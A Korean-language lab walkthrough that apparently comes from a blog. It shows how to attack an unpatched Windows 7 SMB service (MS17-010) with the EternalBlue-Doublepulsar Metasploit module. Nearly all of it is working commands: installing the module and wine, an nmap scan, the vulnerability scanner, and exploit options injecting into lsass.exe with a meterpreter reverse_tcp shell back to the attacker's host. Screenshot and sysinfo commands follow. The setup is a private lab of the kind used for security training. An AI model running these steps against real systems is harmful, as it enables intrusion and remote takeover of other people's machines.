이터널블루(EternalBlue)는 미국 국가안보국(NSA)에 의해 개발된 것으로 섀도우브로커즈(Shadow Brokers)해킹 그룹에 의해 유출된 취약점 공격 도구이며, SMB 프로토콜의 원격코드실행 취약점(MS17-010)을 이용한다.
더블펄서(Doublepulsar)는 감염된 시스템에 악성코드를 삽입 및 실행하는 백도어 툴이다. 2017년 5월 12일에 워너크라이 랜섬웨어 공격에서 eternalblue와 함께 사용되었다.
git clone https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit
eternalblue_doublepulsar.rb 파일을 Metasploit-framework에 복사
cp -v eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
1) 공격자는 서비스를 배포중인 서버에 대해 포트 스캐닝 실행
2) 운영 중인 서버 내의 취약점 파악 ex)SMB서비스
3) 서비스의 취약점(MS17-010)을 통해 공격 시도
4) 서버 정보 탈취 및 조작
공격자 PC
OS: Linux kali 6.0.0-kali3-amd64
IP: 192.168.0.18
희생자 PC
OS: Windows7 Ultimate SP1 x64
IP: 192.168.0.99
TCP 445 = Microsoft-ds(Data share)
nmap -sS -v 192.168.0.99
Postgresql 실행 후, 공격을 위한 Metasploit 실행
service postgresql start
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts [희생자IP]
run (또는 exploit)
취약점 존재여부 확인 완료
wine : 마이크로소프트 윈도우 전용 프로그램을 유닉스 계열 운영체제에 실행하기 위한 호환성 프로그램
sudo apt install wine
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32 -y
winecfg (초기설정)
설치 참조: https://www.bddungsblog.com/2022/04/wine-how-to-install-wine-on-kali-linux.html
use exploit/windows/smb/eternalblue_doublepulsar
show options
옵션 설정
set processinject lsass.exe -> 공격대상 운영체제 : x64
set rhosts 192.168.0.99 -> 희생자 IP
set targetarchitecture x64 -> 공격대상 운영체제 : x64
set payload windows/x64/meterpreter/reverse_tcp -> 공격대상 운영체제 : x64
set lport 9999 -> 포트 지정
옵션 설정 확인
exploit
sysinfo
screenshot
help (다른 설정 보려면)
137/UDP, 138/UDP, 139/TCP, 445/TCP